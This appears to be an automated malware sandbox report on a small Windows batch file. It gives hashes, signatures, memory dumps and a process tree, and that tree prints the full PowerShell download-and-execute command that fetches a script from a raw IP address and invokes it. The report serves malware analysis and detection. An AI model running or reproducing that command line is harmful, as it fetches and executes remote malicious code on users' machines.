Analysis

  • max time kernel
    88s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    23-06-2020 03:10

General

  • Target

    ba14ab3ed6e7b7ab08b7add2a00958b9.bat

  • Size

    216B

  • MD5

    be80d5e6a14a15ec34832dbba9abf139

  • SHA1

    3f56abfb2adcb556bdabeac9b92de7520a81ccbf

  • SHA256

    c21697f0b7e8c644cf9bc515972a1ec3b8c3c357c123dd8b06c1fa1f93e6b88b

  • SHA512

    20f8041a4f2f000a47bb0f9fb7c4af1b8f4842c6706252ccc4abda665be8f7ae22b1a6d8385a19bc1d0f1e006ffb667334d127cbd70bf66a58e146b039dcd73d

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/ba14ab3ed6e7b7ab08b7add2a00958b9

Signatures

  • Suspicious use of WriteProcessMemory 3 IoCs
  • Program crash 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ba14ab3ed6e7b7ab08b7add2a00958b9.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3060
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ba14ab3ed6e7b7ab08b7add2a00958b9');Invoke-PYHZVCNXW;Start-Sleep -s 10000"
      2⤵
        PID:3888
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3888 -s 704
          3⤵
          • Program crash
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious behavior: EnumeratesProcesses
          PID:3792

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/3792-1-0x0000000004960000-0x0000000004961000-memory.dmp

      Filesize

      4KB

    • memory/3792-8-0x0000000005090000-0x0000000005091000-memory.dmp

      Filesize

      4KB

    • memory/3888-0-0x0000000000000000-mapping.dmp

    • memory/3888-2-0x0000000000000000-mapping.dmp

    • memory/3888-3-0x0000000000000000-mapping.dmp

    • memory/3888-4-0x0000000000000000-mapping.dmp

    • memory/3888-5-0x0000000000000000-mapping.dmp

    • memory/3888-6-0x0000000000000000-mapping.dmp

    • memory/3888-7-0x0000000000000000-mapping.dmp